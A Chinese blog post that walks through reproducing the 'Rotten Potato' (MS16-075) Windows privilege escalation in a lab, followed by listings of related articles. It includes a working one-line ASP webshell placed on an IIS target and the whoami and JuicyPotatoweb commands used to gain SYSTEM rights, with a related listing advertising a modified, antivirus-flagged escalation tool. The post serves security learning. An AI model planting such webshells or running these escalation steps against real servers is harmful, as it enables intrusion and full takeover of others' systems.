Windows-烂土豆提权

已于 2023-03-09 11:00:42 修改
阅读量819 收藏 4
点赞数
分类专栏: 后渗透 文章标签: 网络安全 系统安全 windows
于 2023-03-09 10:58:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43381463/article/details/129418804
版权

Windows-烂土豆提权

漏洞复现-烂土豆提权(MS16-075)

0x00 前言

烂土豆提权,即使用CVE-2016-3225(MS16-075)漏洞进行提权,当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞。成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。攻击者登录系统后,运行一个经特殊设计的应用程序利用此漏洞,从而控制受影响的系统。

影响版本:Windows 7、Windows 8.1、Windows 10、Windows Server 2008、Windows Server 2012等,以上版本系统若未安装相应补丁,则大概率存在此漏洞。

靶机攻击机
操作系统Windows 10 Version 1903kali
IP地址192.168.12.140192.168.12.135
备注主机安装IIS 8.0,且已上传asp一句话木马

0x01 搭建靶场

Windows Server 2012

服务器管理器”->点击“添加角色和功能
在“服务器角色”中勾选“Web 服务器(IIS)”。
在“角色服务”中,展开“应用程序开发”,勾选“.NET Extensibility 4.5”、“ASP”等

打开默认站点所在的目录,一般为“C:\inetpub\wwwroot”,创建一个upload文件夹,并赋予相关权限。
在upload目录下创建shell.asp,内容为asp的一句话木马,此处直接模拟攻击者上传一句话木马。
 <%execute request("a")%>

0x02 漏洞复现

1、菜刀连接

2、打开虚拟终端,查看当前用户及用户权限。

 whoami
 whoami /priv

image-20230301215526859

此处发现其拥有SeImpersonate权限。

3、使用菜刀上传漏洞利用工具,使用WebShell版的JuicyPotato工具JuicyPotatoweb。

image-20230301215717945

4、在虚拟终端中,切换到upload目录,使用JuicyPotatoweb.exe执行如下命令进行提权。

 JuicyPotatoweb.exe -p "whoami"

image-20230301215902773

贫僧法号云空丶
关注
专栏目录
土豆提权神器(改进版)
04-15
本工具从原版土豆工具里进行修改以避免每次在使用时都需要输入复杂的命令,使用方法如下: 假如操作系统是windows 2008 R2,则在命令提示符中,首先切换到该工具所在的目录,然后输入JuicyPotato.exe -p "这里粘贴想要执行的系统命令" 即可获得system权限(该工具在git hubu上)。具体的使用方法请查看本人的文章:服务器提权常见方法介绍。 本着免费分享的原则,下载时不需要扣除用户的积分,可放心和使用。同时由于本工具涉及的敏感操作,杀毒软件一定会报毒,可添加信任,如果不放心,请在虚拟机中使用。
Windows土豆提权复现(MS16-075)
oiadkt的博客
03-08 2377
Windows土豆提权复现(MS16-075)
windows 提权方式汇总
最新发布
LINGX5的博客
08-25 734
出发 NTLM 认证机制后,把流量包转到了 kali 主机的 135 端口上,再有 kali 主机上转给 windows 主机的 9999 端口,从而实现了。
Windows提权土豆
2401_84275261的博客
04-18 759
我们今天利用土豆来对windows进行提权;靶机:windows-2003我们先用kali的msf工具生成一个木马。msf启动命令:msfconsole,或者直接输入命令来生成木马这里先启动msf然后我们生成木马最后通过通过中国菜刀将我们生成的木马放入目标网站启动msf的监听状态设置参数。接下来用最常规的方法提权,发现提权失败我们需要查找可以利用的漏洞,今天以“土豆”为例作为演示设置对应的参数,并开始攻击结果还是不能成功拿到权限,我们可以用伪造token值(在身份认证中,token是令牌(临时)的意思,
渗透测试提权指南
遇事不决冲冲冲
12-04 7569
windows系统提权 参考内网安全攻防:渗透测试实战指南(百度百科) 一.系统内核漏洞 利用已存在未安装补丁的漏洞进行提权 参考Windows系统内核溢出漏洞提权 1.手动寻找缺失补丁 拿到权限后通过如下命令查看系统安装了哪些补丁 systeminfo wmic qfe get caption,description,hotfixid,installedon 比CMD更强大的命令行:WMIC后渗透利用(系统命令) 通过没有列出的补丁号,寻找相应的提权EXP进行提权(挺离谱的感觉) 系统漏洞与对应的
Windows提权_土豆家族
weixin_39953838的博客
01-12 605
风吹浮萍有相见!
48-4 内网渗透 - Rotten Potato(土豆) 提权
weixin_43263566的博客
06-21 540
在渗透测试中,Potato家族是一种常用的提权技术,主要利用Windows服务账户的特权来将已获取的权限提升至系统(SYSTEM)级别。具体而言,Potato家族的攻击方式是将已获得的NT AUTHORITY\SYSTEM账户的访问令牌传递给CreateProcessWithTokenW或CreateProcessAsUserA函数,从而在SYSTEM账户的上下文中启动新进程,从而实现权限提升。,这篇文章介绍的提权方式跟之前最大的优势就是可以通过。,上一篇文章介绍的只能在管理员权限的基础上提升。
权限提升之利用相关服务提权(土豆系列).pdf
10-21
土豆系列提权是基于Windows系统中的一些特性和漏洞,通过使用这些方法可以获取SYSTEM权限,且可以在各种场景下使用。但是,需要注意的是,这些方法都需要特定的权限和条件,否则无法使用。 在实际使用中,需要...
第62天:权限提升-土豆&dll劫持&引号路径&服务权限1
08-03
本文将深入探讨四种常见的提权技术:土豆、DLL劫持、不带引号的服务路径以及不安全的服务权限配置,并通过具体案例来解析这些技术的工作原理和利用过程。 首先,土豆是一种Windows权限提升漏洞,它允许攻击者...
雅奇-小土豆最新说明书
05-12
雅奇-小土豆是一款软件开发工具,其最新说明书主要涵盖了软件的基础使用、设计器特性和数据库操作等方面的知识点。下面将详细阐述这些内容。 1. **初次安装与使用** - **安装操作**:这部分内容详细介绍了如何下载...
土豆
02-11
"土豆"是一个示例应用程序,它用于演示与工程软件即服务相关的功能,可能是为了教育或实践目的。这个项目以Ruby编程语言为基础,这表明它使用了Ruby on Rails框架,这是一个非常流行的Web开发平台。Ruby on Rails...
土豆提权复现
longwanlian的博客
10-16 389
值得注意的是,土豆方法只适用于符合特定条件的Windows版本和配置,例如使用旧版的Windows Server操作系统以及较早的Windows 10版本。根据微软的修补程序,土豆漏洞已经在最新版本的Windows中被修复。本次为复现提权的实验,所以就对传递shell之间的细节忽略,拖拽shell上传目标靶机,在双击文件,笔记是一边复现一边写的。现在改用windows版本的msf倒是成功进入meterpreter后渗透模块。然后依旧没有成功,休息了一下,晚上看的时候就成功了,有时候还怪玄学的。
提权 - Windows 土豆/ dll劫持 /服务权限
acepanhuan的博客
03-01 1272
提权 - Windows 土豆/ dll劫持 /服务权限
windows提权土豆(RottenPotato)及Juicy Potato提权
热门推荐
negnegil的博客
09-11 1万+
介绍 土豆(Rotten Potato) MS16-075 提权是一个本地提权,只针对本地用户,不支持域用户 适用版本:Windows 7、8、10、2008、2012 土豆下载地址: https://github.com/foxglovesec/Potato 土豆提权原理: 欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。 对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通
windows权限提升——土豆+dll劫持+引号路径&+服务权限
W小哥
12-06 4353
一、win2012—土豆配合令牌窃取提权—web权限 1.1 RottenPotato(土豆提权的原理 1.欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。 2.对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通过一系列的Windows API调用实现的。 3.模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个
windows 提权 CVE-2016-3225 CVE-2014-4113 CVE-2020-0787
qq_44905657的博客
01-07 3757
windows提权 1、搭建环境 我们先使用一个windows server 2012 R2,搭建IIS,弄一个建议网站,传个123.aspx大马 该大马可以执行文件、命令以及上传等操作,但是他有些目录是无法操作的,我们再上传一个6.asp扫描当前指定路径的可操作路径。 其中红色表示文件可替换,蓝色表示目录可写,我们选择一个C:\windows\Temp路径操作 2、各种提权 我们先使用windows server 2012比较常见的几种提权方式,CVE-2016-3225 (MS16-075) 当攻
webshell提权_提权小神器JuicyPotato多种应用场景详解
weixin_42176827的博客
01-12 1292
0X00-Juicy-Potato简介Juicy Potato江湖人称土豆,是在MS16-075漏洞利用工具RottenPotatoN工具的基础上做了扩展(带有糖的RottenPotatoNG,带有一点汁液,即Windows服务帐户中的**另一种本地特权升级工具)到NT AUTHORITY \ SYSTEM ***)追根到底是一种Windows的本地提权工具,利用了COM对象进行提权 ...
提权小神器-JuicyPotato多种应用场景详解
J0o1ey Blog
03-25 7657
0X00-Juicy-Potato简介 Juicy Potato江湖人称土豆,是在MS16-075漏洞利用工具RottenPotatoN工具的基础上做了扩展(A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows S...
Windows提权
haoge1998的博客
04-25 4885
Windows提权 Windows基础知识 一、用户与用户组 在Windows中,不同用户有着不同的权限。主要权限包括有: 完全控制 修改 读取和执行 列出文件夹内容 读取 写入 1、内置用户 Administrator:系统管理员账号,拥有完全控制权 Guest:来宾账号,基本权限,默认时禁用 2、查看本地用户 net user 3、查看用户详细信息 net user darkid 用户也可以属于多个用户组,常见的用户组是 管理组(Administrators)、普通用户组(Users)、i
windows提权工具 土豆
09-17
土豆(Lazy Potato)是一个流行的Windows提权工具,它利用了Windows操作系统的一个安全漏洞来获取管理员权限。这个漏洞存在于Windows服务管理器中的权限提升合法请求的处理过程中。 土豆工具的原理是利用DCE/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值